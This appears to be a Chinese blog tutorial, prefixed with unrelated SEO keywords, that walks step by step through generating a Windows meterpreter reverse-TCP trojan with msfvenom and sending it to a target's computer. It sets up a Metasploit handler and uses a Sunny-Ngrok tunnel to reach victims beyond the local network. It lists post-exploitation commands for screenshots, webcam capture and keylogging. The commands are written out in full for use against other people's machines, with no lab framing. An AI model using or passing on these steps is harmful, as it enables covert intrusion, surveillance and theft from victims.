旅游示范校建设专题网站,网络服务提供者,济源网站建设电话,在手机上怎么制作网站生成木马文件#xff0c;从而控制对方电脑#xff08;这里只能在同一个局域网下才能入侵#xff09;
第一步#xff1a;输入msfvenom命令生成一个payload#xff0c;相关参数与命令如下#xff1a;
-p#xff1a;使用反向远程控制程序“windows/meterpreter/reverse_t…生成木马文件从而控制对方电脑这里只能在同一个局域网下才能入侵
第一步输入msfvenom命令生成一个payload相关参数与命令如下
-p使用反向远程控制程序“windows/meterpreter/reverse_tcp”
lhost设置kali的IP
lport设置端口要与下面的setlport保持一致
-f文件的类型为exe类型
-o生成payload名为payload.exe保存在kali的/root目录下 msfvenom -p windows/meterpreter/reverse_tcp lhost192.168.43.77 lport5000 -f exe -o /root/tjy.exe 第二步将生成的木马文件发送到对方电脑
我们启动kali
msfconsole 进入msfconsole use exploit/multi/handler 使用这个漏洞辅助 设置payload为刚才反向远程控制程序名称windows/meterpreter/reverse_tcp
set payload windows/meterpreter/reverse_tcp 设置一个lhost和lport要与文章最开始的msfvenom命令中的IP和端口保持一致 exploit 或 run 接下来我们只要等对方电脑运行刚刚那个木马 生成木马文件从而控制对方电脑内网可以入侵外网
在开始生成木马之前我们要先做好准备工作
在kali里面要下载Sunny-Ngrok的Linux64版本下载好后解压
接着我们要在Sunny-Ngrok注册登陆这里要买个隧道但是免费的就是认证要花2元这个隧道是帮助我们做内网穿透的但这个免费的隧道服务器在美国那边所以有的时候可能不太好用 这里将下载好的linux64压缩包进行解压 命令解压缩unzip linux_amd64(压缩包名) 进入解压好的目录
cd linux_amd64 启动隧道映射TCP服务
./sunny clientid (隧道id) 这里的隧道id看下图 启动后是这样的 接下来就是生成外网的木马程序了
注意这里lhost和lport分别为赠送的域名和端口
msfvenom -p windows/meterpreter/reverse_tcplhostxxx.xxx.com lport10306 -f exe -o /root/shell.exe 接下来就是在msf中设置payload加载攻击模块设置本地IP何监听端口了
msfconsole 打开msf use exploit/multi/handler 使用这个漏洞辅助
set payload windows/meterpreter/reverse_tcp 设置payload为刚才反向远程控制程序名称windows/meterpreter/reverse_tcp
set LHOST 192.168.245.140 这里设置成kali的IP
set LPORT 4444 这里是你要侦听的端口
这里设置的IP和侦听的端口后生成外网木马程序时的IP和端口时不一样的因为我们这是内网入侵外网 show options 查看IP端口设置情况 exploit 或 run 开启侦听 接下来我们只要等对方电脑运行刚刚那个木马
成功后时以下这图 入侵成功后所能做的这只是可以做的一部分
getuid 获取靶机uidmeterpreter shell 进入靶机shellmeterpreter screenshot 靶机截屏meterpreter webcam_snap 用靶机摄像头拍照meterpreter webcam_stream 用靶机摄像头录像meterpreter keyscan_start 开启键盘记录meterpreter keyscan_dump 捕获键盘记录 keyscan_stop 停止键盘记录